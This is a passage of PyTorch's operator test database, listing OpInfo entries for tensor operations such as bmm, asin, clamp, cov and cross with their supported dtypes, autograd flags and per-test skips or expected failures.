tol(atol=1e-05, rtol=1.2e-03)}), 'TestMathBits', 'test_conj_view', device_type='cuda')], sample_inputs_func=sample_inputs_baddbmm), OpInfo('dot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, sample_inputs_func=sample_inputs_dot_vdot, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('vdot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_dot_vdot, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('bmm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), ), sample_inputs_func=sample_inputs_bmm), OpInfo('mv', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_mv), OpInfo('addr', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), backward_dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), backward_dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), # Reference: https://github.com/pytorch/pytorch/issues/50747 supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/50747 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16)), ), sample_inputs_func=sample_inputs_addr, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('addcmul', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # TODO: update sample inputs with for_inplace_variant kwarg to support this test DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.int8, torch.int16, torch.int32, torch.int64)), ), sample_inputs_func=sample_inputs_addcmul_addcdiv), OpInfo('addcdiv', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # TODO: update sample inputs with for_inplace_variant kwarg to support this test DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), ), sample_inputs_func=sample_inputs_addcmul_addcdiv), UnaryUfuncInfo('asin', aliases=('arcsin', ), ref=np.arcsin, domain=(-1, 1), supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), assert_autodiffed=True, decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-05, rtol=1e-03)}), 'TestUnaryUfuncs', device_type='cuda'), precisionOverride({torch.bfloat16: 1e-2}), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), # NOTE: derivative for inplace asinh is not implemented UnaryUfuncInfo('asinh', aliases=('arcsinh', ), ref=np.arcsinh, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('atan', aliases=('arctan', ), ref=np.arctan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, decorators=(precisionOverride({torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM, device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_WITH_ROCM, device_type='cuda', dtypes=[torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), BinaryUfuncInfo('atan2', aliases=('arctan2',), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), UnaryUfuncInfo('atanh', aliases=('arctanh', ), ref=np.arctanh, domain=(-1, 1), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 1e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cfloat], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_WITH_ROCM, device_type='cuda', dtypes=[torch.complex128]), )), OpInfo('allclose', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), ref=np.allclose, supports_autograd=False, supports_forward_ad=False, sample_inputs_func=sample_inputs_allclose, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), ), supports_out=False), OpInfo('broadcast_to', ref=np.broadcast_to, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_broadcast_to), OpInfo('broadcast_shapes', op=torch.broadcast_shapes, ref=np.broadcast_shapes if np.lib.NumpyVersion(np.__version__) >= '1.20.0' else None, dtypes=_dispatch_dtypes((torch.float32,)), supports_out=False, supports_gradgrad=False, assert_autodiffed=False, supports_autograd=False, supports_scripting=False, sample_inputs_func=sample_inputs_broadcast_shapes, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # skip dtype tests since broadcast_shape is not device dependent. # having dtypes limited to torch.float32 would cause test_dtypes to report unexpected success DecorateInfo(unittest.skip('Skipped!'), 'TestCommon', 'test_dtypes'), # skip these tests since we have non tensor input DecorateInfo(unittest.skip('Skipped!'), "TestCommon", "test_noncontiguous_samples"), DecorateInfo(unittest.skip('Skipped!'), 'TestCommon', 'test_variant_consistency_eager'), DecorateInfo(unittest.skip('Skipped!'), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('broadcast_tensors', ref=np.broadcast_arrays, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_broadcast_tensors, reference_inputs_func=reference_inputs_broadcast_tensors, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), )), OpInfo('block_diag', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # Default batching rule in core doesn't work for ops with TensorList args check_batched_forward_grad=False, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_block_diag), UnaryUfuncInfo('bitwise_not', ref=np.bitwise_not, dtypes=integral_types_and(torch.bool), operator_variant=operator.invert, supports_autograd=False), BinaryUfuncInfo('bitwise_left_shift', op=torch.bitwise_left_shift, dtypes=integral_types(), dtypesIfCUDA=integral_types(), operator_variant=operator.lshift, inplace_operator_variant=operator.ilshift, supports_autograd=False, supports_one_python_scalar=True, rhs_make_tensor_kwargs=dict(low=0), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('bitwise_right_shift', op=torch.bitwise_right_shift, dtypes=integral_types(), dtypesIfCUDA=integral_types(), operator_variant=operator.rshift, inplace_operator_variant=operator.irshift, supports_autograd=False, supports_one_python_scalar=True, rhs_make_tensor_kwargs=dict(low=0), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), OpInfo('combinations', op=torch.combinations, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_inputs_combinations), OpInfo('cartesian_prod', op=torch.cartesian_prod, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cartesian_prod, skips=( DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), )), OpInfo('cdist', dtypes=floating_types(), supports_out=False, supports_gradgrad=False, assert_autodiffed=False, sample_inputs_func=sample_inputs_cdist), UnaryUfuncInfo('ceil', ref=np.ceil, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), OpInfo('cholesky', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack],), OpInfo('cholesky_inverse', dtypes=floating_and_complex_types(), backward_dtypes=floating_and_complex_types(), supports_fwgrad_bwgrad=True, supports_forward_ad=True, check_batched_gradgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky_inverse, gradcheck_wrapper=gradcheck_wrapper_triangular_input_real_positive_diagonal, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Strides are not the same! Original strides were ((4, 2, 1),) and strides are now ((4, 1, 2),) DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),)), OpInfo('cholesky_solve', op=torch.cholesky_solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_cholesky_solve, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_wrapper=lambda *args, **kwargs: gradcheck_wrapper_triangular_input(*args, idx=1, **kwargs), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack]), OpInfo('chunk', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_chunk, reference_inputs_func=reference_inputs_chunk, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('clone', ref=np.copy, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_clone, reference_inputs_func=reference_inputs_clone, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('contiguous', op=lambda x, *args, **kwargs: x.contiguous(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_contiguous, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_fusible_nodes=['aten::contiguous'], assert_jit_shape_analysis=True, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('sum_to_size', op=lambda x, *args, **kwargs: x.sum_to_size(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_sum_to_size, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float,)),),), OpInfo('symeig', dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, sample_inputs_func=sample_inputs_symeig, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off]), # NOTE: clamp has separate opinfos for scalar min/max (unary op) vs. tensors OpInfo('clamp', aliases=('clip',), ref=_clamp_numpy, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_clamp, reference_inputs_func=partial(reference_inputs_elementwise_ternary, sample_inputs_func=sample_inputs_clamp), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # nvFuser and NNC appear to not handle boolean clamp DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bool,)), )), UnaryUfuncInfo('positive', ref=np.positive, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), UnaryUfuncInfo('conj', ref=np.conj, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_sparse=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('conj_physical', ref=np.conj, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # RuntimeError: inputSet && outputSet # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":118, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32, )), DecorateInfo(unittest.skip("Skipped! conj_physical_ not implemented for sparse"), 'TestSparseUnaryUfuncs', 'test_inplace'), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_consistency", dtypes=(torch.complex32,)), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_unary_inplace", dtypes=(torch.complex32,)), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_unary_out", dtypes=(torch.complex32,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_zero_to_zero_correspondence_unary", dtypes=(torch.complex32,)), )), OpInfo('resolve_conj', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_view_as_real, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, ), OpInfo('resolve_neg', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_view_as_real, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, ), OpInfo('view_as_real', dtypes=complex_types(), supports_forward_ad=True, supports_out=False, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_view_as_real, test_conjugated_samples=False, ), OpInfo('view_as_complex', dtypes=floating_types_and(torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, test_neg_view=False, sample_inputs_func=sample_inputs_view_as_complex, skips=( # RuntimeError: Tensor must have a last dimension with stride 1 DecorateInfo(unittest.expectedFailure, "TestCommon", "test_noncontiguous_samples"), # RuntimeError: "eq_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.half,)), # RuntimeError: "eq_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.half,)), )), BinaryUfuncInfo('complex', dtypes=floating_types_and(torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # Test doesn't account for complex's type promotion semantics DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps'), )), BinaryUfuncInfo('copysign', dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('corrcoef', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_corrcoef, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('cos', ref=np.cos, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, handles_large_floats=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), # This fails on CUDA but passes on ROCm DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,), device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), )), UnaryUfuncInfo('cosh', ref=np_unary_ufunc_integer_promotion_wrapper(np.cosh), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/48641 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.int8]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), )), OpInfo('cov', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_cov, error_inputs_func=error_inputs_cov, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Float did not match double DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), # Jacobian mismatch DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Barely fails"), 'TestGradients', 'test_fn_fwgrad_bwgrad'), # JIT test not working for tensor kwargs (https://github.com/pytorch/pytorch/issues/58507) # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0): # return torch.cov(i0, correction=0, fweights=None, aweights=tensor([0.0518, 0.4681], dtype=torch.float32, requires_grad=True)) # noqa: B950 # ~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), )), OpInfo('cross', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half), sample_inputs_func=sample_inputs_cross, supports_fwgrad_bwgrad=True, supports_out=True, supports_forward_ad=True), OpInfo('linalg.cross', ref=lambda x, y, dim=-1: np.cross(x, y, axis=dim), op=torch.linalg.cross, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half), aten_name='linalg_cross', sample_inputs_func=sample_inputs_cross, supports_out=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('cumsum', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, 